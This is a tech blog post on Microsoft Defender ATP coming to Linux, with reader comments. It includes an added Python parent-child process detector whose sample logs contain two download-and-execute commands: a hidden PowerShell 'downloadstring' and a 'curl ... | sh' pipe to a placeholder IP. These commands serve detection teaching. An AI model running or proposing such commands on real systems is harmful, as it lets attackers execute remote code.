Microsoft Defender ATP is Coming to Linux! What Does it Mean?

Microsoft has announced that it is bringing its enterprise security product Microsoft Defender Advanced Threat Protection (ATP) to Linux in 2020.

Microsoft Ignite, Microsoft’s annual conference for IT professionals, has just concluded, and there are a few important announcements that relate to Linux. You have probably already read about Microsoft bringing its Edge web browser to Linux. The next big news is that Microsoft is bringing Microsoft Defender ATP to Linux.

Let’s get into some details about what it is and why Microsoft is bothering to develop something for Linux.

What is Microsoft Defender ATP?

If you have used Windows in the past few years, you must have come across Windows Defender. It is essentially Microsoft’s built-in antivirus, providing a baseline level of protection by detecting viruses and malware.

Microsoft extended this functionality for its enterprise users by introducing Windows Defender ATP (Advanced Threat Protection). Defender ATP works on behavioral analysis: an endpoint sensor collects behavioral data (process, file and network activity) and stores it on the same system. When it notices behavior that is inconsistent with the norm, it sends the data to Microsoft’s Azure cloud service, where it is correlated against a large collection of behavioral data and known anomalies.

For example, if you receive a PDF attachment by email, open it, and the PDF reader spawns a command prompt, Defender ATP will flag this abnormal parent-child process behavior. I recommend reading this article to learn more about the difference between Defender and Defender ATP.
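As an added illustration of the parent-child detection just described (example code, not Microsoft’s or Defender ATP’s own logic; the event format, the reader and shell lists, and every log line below are constructed for this example), here is a small detector that applies a static rule plus a learned baseline of normal parent/child process pairs. It goes slightly beyond the text by covering the equivalent Linux document viewers alongside the Windows case, since Linux is the platform this page is about.

```python
"""Toy behavioural detection in the spirit of the PDF-spawns-a-shell example.

Added illustration, not Microsoft's code: the event format, the process
allow/deny lists and every log line below are constructed for this example.
"""
import json
from typing import Dict, Iterable, List, Set, Tuple

# Assumption: document viewers/office apps that never legitimately need a shell.
DOCUMENT_READERS = {
    "acrord32.exe", "winword.exe", "excel.exe",        # Windows
    "evince", "okular", "soffice.bin", "libreoffice",  # Linux
}
# Assumption: children that mean "execute code", not "render a document".
SHELLS_AND_INTERPRETERS = {
    "cmd.exe", "powershell.exe", "wscript.exe", "mshta.exe",
    "sh", "bash", "dash", "python3", "perl", "curl", "wget",
}

# Constructed "quiet day" events used to learn which parent->child pairs are normal.
BASELINE_EVENTS = """\
{"ts":"2019-11-04T09:00:00Z","host":"dev-03","user":"bob","parent":"bash","child":"python3","cmdline":"python3 build.py"}
{"ts":"2019-11-04T09:05:00Z","host":"dev-03","user":"bob","parent":"evince","child":"xdg-open","cmdline":"xdg-open https://example.com"}
{"ts":"2019-11-04T09:10:00Z","host":"ws-17","user":"alice","parent":"explorer.exe","child":"AcroRd32.exe","cmdline":"AcroRd32.exe report.pdf"}
"""

# Constructed events for the day under investigation.
SAMPLE_EVENTS = """\
{"ts":"2019-11-05T10:00:01Z","host":"ws-17","user":"alice","parent":"explorer.exe","child":"AcroRd32.exe","cmdline":"AcroRd32.exe invoice.pdf"}
{"ts":"2019-11-05T10:00:04Z","host":"ws-17","user":"alice","parent":"AcroRd32.exe","child":"cmd.exe","cmdline":"cmd.exe /c powershell -nop -w hidden -c iex(new-object net.webclient).downloadstring('http://198.51.100.7/a')"}
{"ts":"2019-11-05T10:01:10Z","host":"dev-03","user":"bob","parent":"bash","child":"python3","cmdline":"python3 build.py"}
{"ts":"2019-11-05T10:02:30Z","host":"dev-03","user":"bob","parent":"evince","child":"sh","cmdline":"sh -c 'curl http://198.51.100.7/x | sh'"}
{"ts":"2019-11-05T10:03:00Z","host":"dev-03","user":"bob","parent":"evince","child":"xdg-open","cmdline":"xdg-open https://example.com"}
{"ts":"2019-11-05T10:04:00Z","host":"dev-03","user":"bob","parent":"bash","child":"git","cmdline":"git status"}
"""

Pair = Tuple[str, str]


def parse_events(text: str) -> List[Dict]:
    """Parse one JSON object per line; blank lines are ignored."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def pair_of(event: Dict) -> Pair:
    """Normalise the (parent, child) process names for comparison."""
    return event["parent"].lower(), event["child"].lower()


def learn_baseline(events: Iterable[Dict]) -> Set[Pair]:
    """The 'usage data kept on the box': every parent->child pair seen so far."""
    return {pair_of(ev) for ev in events}


def violates_rule(event: Dict) -> bool:
    """Static rule: a document reader must never spawn a shell or interpreter."""
    parent, child = pair_of(event)
    return parent in DOCUMENT_READERS and child in SHELLS_AND_INTERPRETERS


def detect(events: Iterable[Dict], baseline: Set[Pair]) -> List[Dict]:
    """Return alerts in event order.

    Rule hits are 'high'; pairs never seen in the baseline are 'low'
    (worth a look by an analyst, not an incident on their own).
    """
    alerts = []
    for ev in events:
        if violates_rule(ev):
            severity = "high"
        elif pair_of(ev) not in baseline:
            severity = "low"
        else:
            continue
        alerts.append({
            "severity": severity,
            "ts": ev["ts"],
            "host": ev["host"],
            "user": ev["user"],
            "reason": f"{ev['parent']} spawned {ev['child']}",
            "cmdline": ev["cmdline"],
        })
    return alerts


if __name__ == "__main__":
    baseline = learn_baseline(parse_events(BASELINE_EVENTS))
    for alert in detect(parse_events(SAMPLE_EVENTS), baseline):
        print(json.dumps(alert))
```

Run as-is, the script raises two high-severity alerts (AcroRd32.exe spawning cmd.exe, evince spawning sh) and one low-severity alert for the never-before-seen bash to git pair; the static rule catches the attack regardless of baseline quality, while the baseline only surfaces novelty for a human to triage.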

Now, this is entirely an enterprise product. In a big enterprise with hundreds or thousands of endpoints (computers), Defender ATP provides a good layer of protection. IT admins get a centralized, cloud-hosted view of their endpoints, where threats can be analyzed and actions taken accordingly.

Microsoft Defender ATP for Linux (and Mac)

Normally, enterprises run Windows on their computers, but Mac and Linux are also becoming popular, especially among developers. In an environment that mixes Mac and Linux machines with Windows, Defender ATP has to extend its coverage to those operating systems so that it can provide a holistic defense for every device on the network.

Keeping that in mind, Microsoft first renamed Windows Defender ATP to Microsoft Defender ATP in March 2019, signaling that the product is not limited to the Windows operating system.

Soon after, it announced Defender ATP for Mac.

And now to cover all the major operating systems in an enterprise environment, Microsoft is bringing Defender ATP to Linux in 2020.

How does Microsoft Defender ATP on Linux impact you, a Linux user?

Since Defender ATP is an enterprise product, I don’t think you need to be bothered by this. Organizations need to secure their endpoints against threats, so it makes sense that Microsoft is extending its product to cover Linux as well.

For normal Linux users like you and me, it won’t make any difference. I am not going to use it to ‘secure’ my three Linux systems and pay Microsoft for that.

Please feel free to share your opinion on Microsoft bringing Defender ATP to Linux in the comment section.


  • Well, I guess it’s a lot easier to port Windows Defender to Linux than to fix Win10 update bughell.

  • This will cause a lack of personal privacy on our own systems. Now Microsoft needs to take control of the Linux domain and the privacy of its users through a legal entrance.

    • Perhaps, but it gets worse. They didn’t move their assets correctly, their system needs massively more help, and not only that, they don’t specialize in Linux and truly don’t know its capabilities. How can they protect something they don’t know well when they can’t protect their own inefficient code well enough?

  • If they open sourced it, someone might use it. I would not trust Microsoft’s word that they have my security as the number one goal.